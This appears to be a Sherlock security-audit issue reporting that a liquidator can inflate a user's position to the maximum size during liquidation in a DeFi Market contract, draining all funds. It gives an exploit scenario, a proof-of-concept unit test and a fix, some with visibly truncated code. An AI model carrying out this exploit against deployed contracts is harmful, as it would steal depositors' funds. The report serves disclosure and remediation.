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panprog - Liquidator can liquidate user while increasing user position to any value, stealing all Market funds or bricking the contract #5

Open sherlock-admin2 opened 11 months ago

sherlock-admin2 commented 11 months ago



Liquidator can liquidate user while increasing user position to any value, stealing all Market funds or bricking the contract


When a user is liquidated, there is a check to ensure that after liquidator order executes, closable = 0, but this actually doesn't prevent liquidator from increasing user position, and since all position size and collateral checks are skipped during liquidation, this allows malicious liquidator to open position of max possible size (2^62-1) during liquidation. Opening such huge position means the Market contract accounting is basically broken from this point without any ability to restore it. For example, the fee paid (and accumulated by makers) from opening such position will be higher than entire Market collateral balance, so any maker can withdraw full Market balance immediately after this position is settled.

closable is the value calculated as the maximum possible position size that can be closed even if some pending position updates are invalidated due to invalid oracle version. For example:

In such scenario closable = 0 (regardless of position size at t=300).

Vulnerability Detail

When position is liquidated (called protected in the code), the following requirements are enforced in _invariant():

if (protected && (
    !context.closable.isZero() || // @audit even if closable is 0, position can still increase
    ) ||, _liquidationFee(context, newOrder)))
)) revert MarketInvalidProtectionError();

if (
    !(context.currentPosition.local.magnitude().isZero() && context.latestPosition.local.magnitude().isZero()) &&   // sender has no position
    !(newOrder.isEmpty() && collateral.gte(Fixed6Lib.ZERO)) &&                                                      // sender is depositing zero or more into account, without position change
    (context.currentTimestamp - context.latestVersion.timestamp >= context.riskParameter.staleAfter)                // price is not stale
) revert MarketStalePriceError();

if (context.marketParameter.closed && newOrder.increasesPosition())
    revert MarketClosedError();

if (
    revert MarketMakerOverLimitError();

if (!newOrder.singleSided(context.currentPosition.local) || !newOrder.singleSided(context.latestPosition.local))
    revert MarketNotSingleSidedError();

if (protected) return; // The following invariants do not apply to protected position updates (liquidations)

The requirements for liquidated positions are:

All the other invariants are skipped for liquidation, including checks for long or short position size and collateral.

As shown in the example above, it's possible for the user to have closable = 0 while having the new (current) position size of any amount, which makes it possible to succesfully liquidate user while increasing the position size (long or short) to any amount (up to max 2^62-1 enforced when storing position size values).

Scenario for opening any position size (oracle granularity = 100): T=1: ETH price = $100. User opens position long = 10 with collateral = min margin ($350) T=120: Oracle version T=100 is commited, price = $100, user position is settled (becomes latest) ... T=150: ETH price starts moving against the user, so the user tries to close the position calling update(0,0,0,0,false) T=205: Current price is $92 and user becomes liquidatable (before the T=200 price is commited, so his close request is still pending). Liquidator commits unrequested oracle version T=190, price = $92, user is liquidated while increasing his position: update(0,2^62-1,0,0,true) Liquidation succeeds, because user has latest long = 10, pending long = 0 (t=200), liquidation pending long = 2^62-1 (t=300). closable = 0.


Malicious liquidator can liquidate users while increasing their position to any value including max possible 2^62-1 ignoring any collateral and position size checks. This is possible on its own, but liquidator can also craft such situation with very high probability. As a result of this action, all users will lose all their funds deposited into Market. For example, fee paid (and accured by makers) from max possible position will exceed total Market collateral balance so that the first maker will be able to withdraw all Market balance, minimal price change will create huge profit for the user, exceeding Market balance (if fee = 0) etc.

Proof of concept

The scenario above is demonstrated in the test, add this to test/unit/market/Market.test.ts:

it('liquidate with huge open position', async () => {
const positionMaker = parse6decimal('20.000')
const positionLong = parse6decimal('10.000')
const collateral = parse6decimal('1000')
const collateral2 = parse6decimal('350')
const maxPosition = parse6decimal('4611686018427') // 2^62-1

const oracleVersion = {
    price: parse6decimal('100'),
    timestamp: TIMESTAMP,
    valid: true,
oracle.status.returns([oracleVersion, TIMESTAMP + 100])

// maker
dsu.transferFrom.whenCalledWith(userB.address, market.address, collateral.mul(1e12)).returns(true)
await market.connect(userB).update(userB.address, positionMaker, 0, 0, collateral, false)

// user opens long=10
dsu.transferFrom.whenCalledWith(user.address, market.address, collateral2.mul(1e12)).returns(true)
await market.connect(user).update(user.address, 0, positionLong, 0, collateral2, false)

const oracleVersion2 = {
    price: parse6decimal('100'),
    timestamp: TIMESTAMP + 100,
    valid: true,
oracle.status.returns([oracleVersion2, TIMESTAMP + 200])

// price moves against user, so he's at the edge of liquidation and tries to close
// position: latest=10, pending [t=200] = 0 (closable = 0)
await market.connect(user).update(user.address, 0, 0, 0, 0, false)

const oracleVersion3 = {
    price: parse6decimal('92'),
    timestamp: TIMESTAMP + 190,
    valid: true,
oracle.status.returns([oracleVersion3, TIMESTAMP + 300])

var loc = await market.locals(user.address);
var posLatest = await market.positions(user.address);
var posCurrent = await market.pendingPositions(user.address, loc.currentId);
console.log("Before liquidation. Latest= " + posLatest.long + " current = " + posCurrent.long);

// t = 205: price drops to 92, user becomes liquidatable before the pending position oracle version is commited
// liquidator commits unrequested price = 92 at oracle version=190, but current timestamp is already t=300
// liquidate. User pending positions:
//   latest = 10
//   pending [t=200] = 0
//   current(liquidated) [t=300] = max possible position (2^62-1)
await market.connect(user).update(user.address, 0, maxPosition, 0, 0, true)

var loc = await market.locals(user.address);
var posLatest = await market.positions(user.address);
var posCurrent = await market.pendingPositions(user.address, loc.currentId);
console.log("After liquidation. Latest= " + posLatest.long + " current = " + posCurrent.long);


Code Snippet

_processPendingPosition calculates context.closable by taking latest position and reducing it any time pending order reduces position, and not changing it when pending order increases position, meaning a sequence like (10, 0, 1000000) will have closable = 0:

_invariant only checks closable for protected (liquidated) positions, ignoring order checks except for closed market:

Tool used

Manual Review


When liquidating, order must decrease position:

if (protected && (
    !context.closable.isZero() || // @audit even if closable is 0, position can still increase
    ) ||
-, _liquidationFee(context, newOrder)))
+, _liquidationFee(context, newOrder))) ||
+    newOrder.maker.add(newOrder.long).add(newOrder.short).gte(Fixed6Lib.ZERO)
)) revert MarketInvalidProtectionError();
kbrizzle commented 11 months ago

Resolved via:

panprog commented 10 months ago

Mitigation Review:
